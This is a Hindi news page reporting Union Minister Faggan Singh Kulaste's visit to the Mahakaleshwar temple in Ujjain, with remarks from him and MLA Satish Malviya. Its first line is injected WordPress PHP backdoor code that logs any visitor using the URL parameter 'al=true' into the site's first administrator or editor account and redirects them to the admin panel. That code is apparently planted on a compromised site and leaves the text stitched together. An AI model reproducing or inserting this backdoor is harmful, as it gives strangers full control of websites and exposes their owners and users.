// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); केंद्रीय इस्पात राज्यमंत्री फग्गन सिंह कुलस्ते महाकाल की शरण पहुंचे, सुख समृद्धि के लिए की कामना – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

केंद्रीय इस्पात राज्यमंत्री फग्गन सिंह कुलस्ते महाकाल की शरण पहुंचे, सुख समृद्धि के लिए की कामना

उज्जैन

 विश्व प्रसिद्ध श्री महाकालेश्वर मंदिर में आये दिन बाबा के दर्शन के लिए लाखों की संख्या में भक्त उज्जैन पहुंचते है। इसी कड़ी में बाबा महाकाल के दर्शन के लिए केंद्रीय इस्पात राज्यमंत्री फग्गन सिंह कुलस्ते उज्जैन पहुंचे और भोलेनाथ का आशीर्वाद लिया। इस दौरान मंत्री जी बाबा महाकाल की भक्ति में लीन दिखाई दिए।

 मैं बाबा महाकाल का अनन्य भक्त हूं

बाबा महाकाल के दर्शन करने के बाद कुलस्ते ने मीडिया से चर्चा करते हुए कहा कि मैं बाबा महाकाल का अनन्य भक्त हूं। जब भी क्षेत्र में आता हूं, बाबा महाकाल के दर्शन और उनका आशीर्वाद लिए बिना कभी नहीं जाता हूं। आज भी मैंने बाबा महाकाल के दर्शन कर उनसे प्रदेश की समृद्धि की कामना की है। सब पर बाबा महाकाल की कृपा बनी रहे बस यही मेरी अपेक्षा है।

विधायक सतीश मालवीय भी मौके पर मौजूद

इस दौरान मंत्री के साथ घटिया क्षेत्र के विधायक सतीश मालवीय भी मौके पर मौजूद रहे। मंत्री जी के आगमन को लेकर विधायक ने कहा कि मंत्री कुलस्ते ने गर्भगृह में पहुंचकर बाबा महाकाल का पूजन अर्चन अभिषेक किया और शीश नवाकर आशीर्वाद भी प्राप्त किया। इस दौरान मंत्री जी बाबा महाकाल की भक्ति में लीन दिखाई दिए। उन्होंने नंदी हॉल में बैठकर ध्यान भी लगाया।

नंदी जी के कानों में कहीं मनोकामना
कुलस्ते ने आज सुबह बाबा महाकाल के दर्शन करने के बाद नंदी जी के कानों में अपनी मनोकामना कही और श्री महाकालेश्वर मंदिर परिसर में स्थित अन्य मंदिरों के दर्शन भी किए।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड